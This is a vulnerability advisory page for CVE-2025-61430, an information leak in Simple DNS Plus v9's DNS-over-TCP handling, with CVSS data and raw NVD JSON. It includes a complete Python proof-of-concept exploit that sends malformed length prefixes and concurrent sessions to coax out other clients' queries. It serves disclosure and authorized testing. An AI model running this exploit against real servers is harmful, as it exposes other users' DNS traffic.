Security Vulnerability Report
CVE-2025-61430 CVSS 6.5 MEDIUM

CVE-2025-61430

Published: 2025-10-24 15:15:41
Last Modified: 2026-04-15 00:35:42

Description

Improper handling of DNS over TCP in Simple DNS Plus v9 allows a remote attacker with querying access to the DNS server to cause the server to return request payloads from other clients. This happens when the two-byte TCP length prefix (RFC 1035 §4.2.2) is malformed — the declared length differs from the actual message length — and, due to a concurrency/buffering issue, even when the lengths match. A length prefix that is smaller than the actual message size increases the amount of information leaked. In summary, this vulnerability allows an attacker who can reach the server over TCP to see the DNS queries of other clients.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No CPE configuration data has been published by NVD for this CVE; the affected-product line below is taken from the description only.

Simple DNS Plus v9 (all versions, per the description; no fixed version is recorded here)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only — run it solely against DNS servers you own or are explicitly permitted to test. Note that the reported leak consists of other clients' request payloads, so a server with no concurrent traffic may show nothing, and any flagged bytes must be inspected by hand before concluding that the server is vulnerable.
python
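#!/usr/bin/env python3
# CVE-2025-61430 PoC - Simple DNS Plus DNS over TCP Information Disclosure
#
# Exercises the two conditions named in the advisory: a TCP length prefix
# that does not match the actual message size, and several concurrent TCP
# sessions with well-formed prefixes.  Run it ONLY against a server you own
# or are explicitly authorised to test.  Because the reported leak consists
# of *other clients'* request payloads, a server with no other traffic may
# show nothing; inspect any flagged bytes by hand before drawing conclusions.
import secrets
import socket
import struct
import sys
import time

# RFC 1035 section 4.2.2: a DNS message carried over TCP is prefixed by a
# TWO-byte big-endian length.  The earlier revision of this PoC packed a
# four-byte ("!I") prefix, which a conforming server reads as a zero-length
# message followed by garbage, so the query never reached the parser.
TCP_LENGTH_PREFIX = struct.Struct('!H')

# DNS header size in bytes (RFC 1035 section 4.1.1).
DNS_HEADER_LEN = 12

# Query types this PoC knows how to encode (RFC 1035 / RFC 3596).
QUERY_TYPES = {'A': 1, 'AAAA': 28}


def create_dns_query(domain, query_type='A', transaction_id=b'\x00\x01'):
    """Build a minimal standard DNS query message (no TCP length prefix).

    Args:
        domain: Name to query, e.g. ``"example.com"``.  A trailing dot is
            accepted and ignored.  Labels are encoded as-is (UTF-8); a
            non-ASCII name would need IDNA encoding first, which this PoC
            does not do.
        query_type: ``"A"`` (default) or ``"AAAA"``.
        transaction_id: Two-byte ID placed in the header.  Callers that need
            to tell their own answer apart from foreign data should pass a
            random value (see ``_random_transaction_id``).

    Returns:
        The wire-format query: 12-byte header, one question, no other records.

    Raises:
        ValueError: on an unknown query type, an empty name, an empty or
            over-long (>63 octet) label, a name over 255 octets, or a
            transaction ID that is not exactly two bytes.
    """
    if len(transaction_id) != 2:
        raise ValueError("transaction_id must be exactly two bytes")
    try:
        qtype = QUERY_TYPES[query_type]
    except KeyError:
        raise ValueError(f"unsupported query type: {query_type!r}") from None

    # Header: ID, flags 0x0100 (standard query, RD set), QDCOUNT=1,
    # ANCOUNT/NSCOUNT/ARCOUNT=0.
    header = bytes(transaction_id) + b'\x01\x00' + b'\x00\x01' + b'\x00\x00' * 3

    # Question: length-prefixed labels, zero terminator, QTYPE, QCLASS=IN.
    labels = domain.rstrip('.').split('.')
    if labels == ['']:
        raise ValueError("domain must not be empty")
    encoded = []
    for label in labels:
        raw = label.encode()
        if not 1 <= len(raw) <= 63:
            raise ValueError(f"bad DNS label length: {label!r}")
        encoded.append(struct.pack('B', len(raw)) + raw)
    qname = b''.join(encoded) + b'\x00'
    if len(qname) > 255:
        raise ValueError("domain name exceeds 255 octets")

    return header + qname + struct.pack('!HH', qtype, 1)


def _random_transaction_id():
    """Return two random bytes for a DNS header ID (CSPRNG-backed)."""
    return secrets.token_bytes(2)


def _read_response(sock, timeout, grace=0.5):
    """Collect whatever the server sends on *sock*.

    Waits up to *timeout* seconds for the first chunk, then keeps reading
    while further data arrives within *grace* seconds of the previous chunk,
    so any bytes trailing the real answer are captured too.

    Returns:
        All bytes received, or ``b''`` if nothing arrived before the timeout
        or the peer closed the connection.  Only timeouts are swallowed;
        other socket errors propagate.
    """
    chunks = []
    wait = timeout
    while True:
        sock.settimeout(wait)
        try:
            chunk = sock.recv(4096)
        except socket.timeout:
            break
        if not chunk:
            break
        chunks.append(chunk)
        wait = grace
    return b''.join(chunks)


def inspect_response(data, sent_queries):
    """Classify bytes received on one TCP session.

    ``data`` should consist of length-prefixed DNS messages (RFC 1035
    section 4.2.2), each answering one of ``sent_queries`` (the messages we
    sent on this session, without their prefixes).  Anything else is
    reported: a frame whose ID/question matches none of our queries, a
    prefix that claims more bytes than arrived, or leftover bytes that do
    not form a complete frame.  This is a heuristic for "not an answer to
    us", not proof that the bytes belong to another client.

    Args:
        data: Raw bytes received (may be empty).
        sent_queries: One query (``bytes``) or an iterable of queries.

    Returns:
        A list of human-readable findings; an empty list means every frame
        parsed as an answer to one of our own queries.
    """
    if isinstance(sent_queries, (bytes, bytearray)):
        sent_queries = [sent_queries]
    # (ID, question section) pairs that a legitimate answer must echo back.
    expected = {
        (bytes(q[:2]), bytes(q[DNS_HEADER_LEN:])) for q in sent_queries
    }

    if not data:
        return ["no data received"]

    findings = []
    offset = 0
    frame_no = 0
    while offset < len(data):
        remaining = data[offset:]
        if len(remaining) < TCP_LENGTH_PREFIX.size:
            findings.append(
                f"{len(remaining)} stray byte(s) at end: {remaining.hex()}"
            )
            break
        (declared,) = TCP_LENGTH_PREFIX.unpack_from(data, offset)
        start = offset + TCP_LENGTH_PREFIX.size
        message = data[start:start + declared]
        offset = start + declared  # always advances by >= 2, so the loop ends
        frame_no += 1

        if len(message) < declared:
            findings.append(
                f"frame {frame_no}: prefix claims {declared} bytes, only "
                f"{len(message)} arrived: {message[:64].hex()}"
            )
            break
        if len(message) < DNS_HEADER_LEN:
            findings.append(
                f"frame {frame_no}: shorter than a DNS header: {message.hex()}"
            )
            continue

        msg_id = bytes(message[:2])
        matched = any(
            msg_id == qid
            and message[DNS_HEADER_LEN:DNS_HEADER_LEN + len(question)] == question
            for qid, question in expected
        )
        if not matched:
            findings.append(
                f"frame {frame_no}: ID {msg_id.hex()} / question do not match "
                f"any query sent on this session: {message[:64].hex()}"
            )
    return findings


def _report(data, sent_queries, label=''):
    """Print the classification of *data* (see ``inspect_response``)."""
    prefix = f"{label} " if label else ''
    if not data:
        print(f"[-] {prefix}no response received")
        return
    print(f"[+] {prefix}received {len(data)} byte(s)")
    findings = inspect_response(data, sent_queries)
    if not findings:
        print(f"[=] {prefix}looks like a normal answer to our own query")
        return
    for finding in findings:
        print(f"[!] {prefix}{finding}")
    print(
        f"[!] {prefix}response is not a plain answer to our query - "
        "inspect the bytes above by hand before concluding anything"
    )


def exploit_malformed_length_prefix(target_ip, target_port=53, length_delta=-10):
    """Send one query whose TCP length prefix mis-states the message size.

    The advisory states that a prefix smaller than the real message size
    increases the leak, so by default the declared length is the true length
    minus 10.  Findings are printed; nothing is returned.

    Args:
        target_ip: Address of the DNS server under test.
        target_port: TCP port (default 53).
        length_delta: Signed adjustment applied to the real message length.

    Raises:
        ValueError: if the adjusted length does not fit the 16-bit prefix.
    """
    dns_query = create_dns_query(
        'example.com', transaction_id=_random_transaction_id()
    )
    declared = len(dns_query) + length_delta
    if not 0 <= declared <= 0xFFFF:
        raise ValueError(
            f"declared length {declared} does not fit a 16-bit length prefix"
        )
    try:
        with socket.create_connection((target_ip, target_port), timeout=10) as sock:
            sock.sendall(TCP_LENGTH_PREFIX.pack(declared) + dns_query)
            print(
                f"[+] Sent query with length prefix {declared} "
                f"(actual message size {len(dns_query)})"
            )
            _report(_read_response(sock, timeout=5), dns_query)
    except OSError as e:
        print(f"[-] Error: {e}")


def exploit_concurrent_leak(target_ip, target_port=53, connections=5):
    """Open several TCP sessions with well-formed prefixes and classify replies.

    Each session sends one query, then all sessions send a second query in
    quick succession to put several reads in flight at once.  Every query
    carries its own random transaction ID, so a frame that answers neither
    query of its session can be recognised.  Findings are printed; nothing
    is returned.

    Args:
        target_ip: Address of the DNS server under test.
        target_port: TCP port (default 53).
        connections: Number of concurrent sessions to open.
    """
    sessions = []  # (socket, [queries sent on it, without length prefix])
    try:
        for i in range(connections):
            try:
                sock = socket.create_connection((target_ip, target_port), timeout=10)
            except OSError as e:
                print(f"[-] connection {i}: {e}")
                break
            queries = []
            # Register before sending so the socket is closed on any failure.
            sessions.append((sock, queries))
            query = create_dns_query(
                f'target{i}.com', transaction_id=_random_transaction_id()
            )
            try:
                sock.sendall(TCP_LENGTH_PREFIX.pack(len(query)) + query)
            except OSError as e:
                print(f"[-] connection {i}: {e}")
                continue
            queries.append(query)
            time.sleep(0.1)

        # Second burst with no pause between sessions.
        for i, (sock, queries) in enumerate(sessions):
            query = create_dns_query(
                'trigger.com', transaction_id=_random_transaction_id()
            )
            try:
                sock.sendall(TCP_LENGTH_PREFIX.pack(len(query)) + query)
            except OSError as e:
                print(f"[-] connection {i}: {e}")
                continue
            queries.append(query)

        for i, (sock, queries) in enumerate(sessions):
            try:
                data = _read_response(sock, timeout=2)
            except OSError as e:
                print(f"[-] connection {i}: {e}")
                continue
            _report(data, queries, label=f"connection {i}:")
    finally:
        for sock, _ in sessions:
            sock.close()


def main(argv=None):
    """CLI entry point: ``cve_2025_61430_poc.py <target_ip> [port]``.

    Returns the process exit status (1 on a usage error, else 0).
    """
    argv = sys.argv[1:] if argv is None else argv
    if not argv:
        print("Usage: python cve_2025_61430_poc.py <target_ip> [port]")
        return 1
    target = argv[0]
    port = int(argv[1]) if len(argv) > 1 else 53
    print(f"[*] Targeting: {target}:{port}")
    print("[*] Testing malformed length prefix attack...")
    exploit_malformed_length_prefix(target, port)
    print("\n[*] Testing concurrent leak attack...")
    exploit_concurrent_leak(target, port)
    return 0


if __name__ == '__main__':
    sys.exit(main())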

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61430", "sourceIdentifier": "[email protected]", "published": "2025-10-24T15:15:40.703", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper handling of DNS over TCP in Simple DNS Plus v9 allows a remote attacker with querying access to the DNS server to cause the server to return request payloads from other clients. This happens when the TCP length prefix is malformed (len differs from actual packet len), and due to a concurrency/buffering issue, even when the lengths match. A length prefix that is smaller than the actual packet size increases information leakage. In summary, this vulnerability allows an attacker to see DNS queries of other clients."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-350"}]}], "references": [{"url": "https://ma-personal.notion.site/simpledns-vuln?source=copy_link", "source": "[email protected]"}, {"url": "https://www.incognitotgt.me/blog/simpledns-vuln", "source": "[email protected]"}]}}